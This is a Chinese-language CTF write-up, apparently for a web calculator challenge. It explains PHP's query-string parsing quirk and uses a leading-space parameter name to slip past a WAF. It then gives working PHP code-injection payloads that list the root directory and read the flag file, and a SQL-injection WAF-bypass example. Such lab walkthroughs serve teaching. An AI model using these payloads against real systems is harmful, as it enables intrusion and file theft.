解题点:php的字符串解析特性
PHP需要将所有参数转换为有效的变量名,因此在解析查询字符串时,它会做两件事:1.删除空白符 2.将某些字符转换为下划线(包括空格)【当waf不让你过的时候,php却可以让你过】
进去是一个网页版计算器,填入非预期的字符串会弹出提示。查看网页源代码有给出部分提示:
<!--I've set up WAF to ensure security.-->
<script>
$('#calc').submit(function(){
$.ajax({
url:"calc.php?num="+encodeURIComponent($("#content").val()),
type:'GET',
success:function(data){
$("#result").html(`<div class="alert alert-success">
<strong>答案:</strong>${data}
</div>`);
},
error:function(){
alert("这啥?算不来!");
}
})
return false;
})
</script>
可以看到提示开了waf,可能是waf过滤了一些特殊符号。提交的请求累心格式GET
,我们输入的字符串会赋给num变量传递。
前面提到题目的关键是php的字符串解析特性,php将查询字符串(在URL或正文中)转换为内部$_GET
或$_POST
的关联数组,例如:/?foo=bar变成Array([foo] => “bar”)。
而php在解析这类查询字符串时会将某些字符删除或用下划线代替。假设有一条waf规则是当news_id参数的值为非数字时拦截,那么为了绕过绕过该规则可以将请求构造为/?%20news[id%00=42"+AND+1=0–
,对于waf来说找不到%20news[id%00
这个变量,然而php在处理时会将空格删除,[
转化为_
,这样值还是可以正常传入$_GET[“news_id”],代码正常运行。
回到题目,为了绕过waf对num
变量的检查,可以在num前加个空格%20num
,对于waf来说找不到这个变量,然而在php解析的时候会将空格去掉,从而变成num。
解决waf过滤的问题,就是构造命令传入。先找出目录下的flag文件:
/?%20num=1;var_dump(scan_dir("/"))
var_dump
可以打印出变量的类型和数值。实际发送请求时发现引号被过滤了,所以用chr()
转/
的ascii码,后续也用此方法进行拼接:
/calc.php?%20num=1;var_dump(scandir(chr(47)))
输出根目录下所有文件:
1array(24) { [0]=> string(1) "." [1]=> string(2) ".." [2]=> string(10) ".dockerenv" [3]=> string(3) "bin" [4]=> string(4) "boot" [5]=> string(3) "dev" [6]=> string(3) "etc" [7]=> string(5) "f1agg" [8]=> string(4) "home" [9]=> string(3) "lib" [10]=> string(5) "lib64" [11]=> string(5) "media" [12]=> string(3) "mnt" [13]=> string(3) "opt" [14]=> string(4) "proc" [15]=> string(4) "root" [16]=> string(3) "run" [17]=> string(4) "sbin" [18]=> string(3) "srv" [19]=> string(8) "start.sh" [20]=> string(3) "sys" [21]=> string(3) "tmp" [22]=> string(3) "usr" [23]=> string(3) "var" }
发现有f1agg
文件,构造payload打印内容:
/calc.php?%20num=1;var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))
打印出flag:
1string(43) "flag{c03bcefa-c9b9-4539-8c21-5d6f72cae76b} "